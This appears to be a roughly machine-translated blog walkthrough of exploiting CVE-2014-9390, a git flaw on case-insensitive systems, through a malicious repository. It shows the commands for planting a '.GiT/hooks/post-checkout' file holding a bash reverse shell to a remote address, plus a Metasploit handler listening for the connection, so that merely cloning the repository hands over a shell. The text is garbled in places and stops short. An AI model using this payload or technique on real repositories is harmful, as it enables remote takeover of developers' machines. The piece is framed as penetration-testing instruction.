One git command may cause hacked (cve-2014-9390)

0x00 background

Cve-2014-9390 is a recent fire bug, a git command could cause you to be hacked, I'm not going to delve into the details of this loophole, the authorities are already https://github.com/blog/1938- Git-client-vulnerability-announced and http://article.gmane.org/gmane.linux.kernel/1853266 have released detailed information. In short, if you use a case-insensitive operating system such as Windows or OSX, you should update the GIT client.

Let's look at this vulnerability in the context of penetration testing.

0x01 Preparation

I created a new project named cve-2014-9390.

Build one. GiT (larger g, lowercase i and then uppercase T) directory, create a vulnerable.txt file, and push it into the project.

12345678910

[email protected]:~/cve-2014-9390# mkdir .GiT[email protected]:~/cve-2014-9390# cd .GiT/[email protected]:~/cve-2014-9390/.GiT# echo "Vulnerable" >> vulnerable.txt[email protected]:~/cve-2014-9390/.GiT# cd ..[email protected]:~/cve-2014-9390# git add .[email protected]:~/cve-2014-9390# git commit -m ‘poc‘[master bec157d] poc1 file changed, 1 insertion(+)create mode 100644 .GiT/vulnerable.txt[email protected]:~/cve-2014-9390# git push

Let's take a look at the same project from the Windows computer with the vulnerable Git client.

123456789

[email protected] ~$ git clone [email protected]:mehmet/cve-2014-9390.gitCloning into ‘cve-2014-9390‘...Enter passphrase for key ‘/c/Users/rootlab/.ssh/id_rsa‘:remote: Counting objects: 7, done.remote: Compressing objects: 100% (3/3), done.remote: Total 7 (delta 0), reused 0 (delta 0)RReceiving objects: 100% (7/7), done.Checking connectivity... done.

Let's see. git directory, which should be in the. Git directory vulnerable.txt is also here

0x02 use What is Git's hooks

Like many other version control systems, Git has a way to execute custom scripts when some important actions occur. Hooks is divided into two aspects: client and server side. The client's hooks can be triggered when commit and merge are made.

You can execute a client script when executing git commands such as git pull and git checkout.

How do I implement git hooks?

Rewrite a script file under the. git/hooks directory, and then execute him, which we can implement through this vulnerability.

We create a fake git directory and then build a file called Post-checkout.

123456789

[email protected]:~/cve-2014-9390# mkdir .GiT/hooks[email protected]:~/cve-2014-9390# echo ‘#!/bin/sh‘ > .GiT/hooks/post-checkout[email protected]:~/cve-2014-9390# echo ‘bash -i >& /dev/tcp/[IPADDRESS]/443 0>&1‘ >> .GiT/hooks/post-checkout[email protected]:~/cve-2014-9390# git add .[email protected]:~/cve-2014-9390# git commit -m ‘add reverse connection payload‘[master 389c979] add powershell payload1 file changed, 4 insertions(+)create mode 100644 .GiT/hooks/post-checkout[email protected]:~//cve-2014-9390# git push

We're listening on the server side.

1234567

msf > Use exploit /multi/handler msf exploit (handler) > set payload generic /shell_reverse_tcp msf exploit (handler) > set lport 443 msf exploit (handler) > set lhost 108.61.164.142 msf exploit (handler) > Exploit [*] Started reverse handler on 108.61.164.142:443 [*] starting the payload handler ...

We clone https://gitlab.com/mehmet/cve-2014-9390

It all looks normal, but ...

One git command may cause hacked (cve-2014-9390)